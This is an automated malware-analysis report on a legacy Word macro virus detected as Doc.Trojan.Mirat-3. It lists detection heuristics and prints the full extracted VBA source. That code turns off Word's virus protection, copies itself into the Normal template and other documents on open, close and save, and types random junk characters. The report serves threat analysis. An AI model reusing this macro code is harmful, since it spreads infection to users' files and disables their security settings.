MALICIOUS
Risk Score: 240
Malware Insights
MITRE ATT&CK: T1059.005 Visual Basic
The sample contains legacy WordBasic macros, including AutoOpen and Auto_Close, which are indicative of older malware techniques. The script attempts to modify registry keys under HKEY_CURRENT_USER\Software\Microsoft\Office\ and appears to copy its macro to the NormalTemplate, suggesting an attempt at persistence or propagation. The ClamAV detection as 'Doc.Trojan.Mirat-3' further supports its malicious nature.
Heuristics (5)
- ClamAV: Doc.Trojan.Mirat-3 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Mirat-3
- VBA macros detected (medium, 2 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE): Auto_Close macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3271 bytes |

SHA-256: 231c2f083fa1e9008fcb0e2549f87188f95097b633f352877e3f226685a413a3

Detection
- ClamAV: Doc.Trojan.Mirat-3
- Obfuscation or payload: unlikely

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "MacRos"
Sub AutoOpen()
Attribute AutoOpen.VB_Description = "Macro created 04/18/01 by Stimpy"
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Project.NewMacros.AutoOpen"
'Viruz: RaYnY_DaY YoHoHo :)
'U are skrewed !
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "RD") <> "GotU" Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "RD") = "GotU"
'SecuritY Sucz
With Options
.ConfirmConversions = False
.UpdateLinksAtOpen = True
.SendMailAttach = True
.VirusProtection = False
.AllowFastSave = True
.BackgroundSave = True
.CreateBackup = False
.SavePropertiesPrompt = False
.SaveInterval = 10
.SaveNormalPrompt = False
End With
With ActiveDocument
.ReadOnlyRecommended = False
.SaveFormsData = False
End With
Application.DefaultSaveFormat = ""
'So bye bye sec.
'Infection TimE
Set myTemplate = NormalTemplate
Application.OrganizerCopy Source:= _
ActiveDocument.FullName, Destination:= _
myTemplate.FullName, Name:= _
"MacRos", Object:=wdOrganizerObjectProjectItems
Documents.Open FileName:=NormalTemplate.FullName, ConfirmConversions:=False, ReadOnly _
:=False, AddToRecentFiles:=False, PasswordDocument:="", PasswordTemplate _
:="", Revert:=False, WritePasswordDocument:="", WritePasswordTemplate:="" _
, Format:=wdOpenFormatAuto
ActiveDocument.Save
ActiveDocument.Close
Else
StatusBar = "HeHeHe"
End If
End Sub
Sub AutoClose()
'Guess What zis duz ?
On Error Resume Next
For Each aVar In ActiveDocument.Variables
If aVar.Name = "Infect" Then num = aVar.Index
Next aVar
If (num = 0) And (ActiveDocument.Name <> NormalTemplate.Name) Then
ActiveDocument.Variables.Add Name:="Infect"
ActiveDocument.Variables("Infect").Value = 1
Set myTemplate = ActiveDocument.AttachedTemplate
Application.OrganizerCopy Source:= _
myTemplate.FullName, Destination:= _
ActiveDocument.FullName, Name:="MacRos", Object:=wdOrganizerObjectProjectItems
ActiveDocument.Save
End If
End Sub
Sub AutoSave()
'Same ol' stuff
On Error Resume Next
For Each aVar In ActiveDocument.Variables
If aVar.Name = "Infect" Then num = aVar.Index
Next aVar
If (num = 0) And (ActiveDocument.Name <> NormalTemplate.Name) Then
ActiveDocument.Variables.Add Name:="Infect"
ActiveDocument.Variables("Infect").Value = 1
Set myTemplate = ActiveDocument.AttachedTemplate
Application.OrganizerCopy Source:= _
myTemplate.FullName, Destination:= _
ActiveDocument.FullName, Name:="MacRos", Object:=wdOrganizerObjectProjectItems
ActiveDocument.Save
End If
End Sub
Sub ViewVBCode()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "RD") = "GotU" Then
Randomize
n = Int((100000 * Rnd) + 1)
For i = 1 To n
txt = Int((180 * Rnd) + 1)
Selection.TypeText Text:=Chr(txt)
Next i
End If
End Sub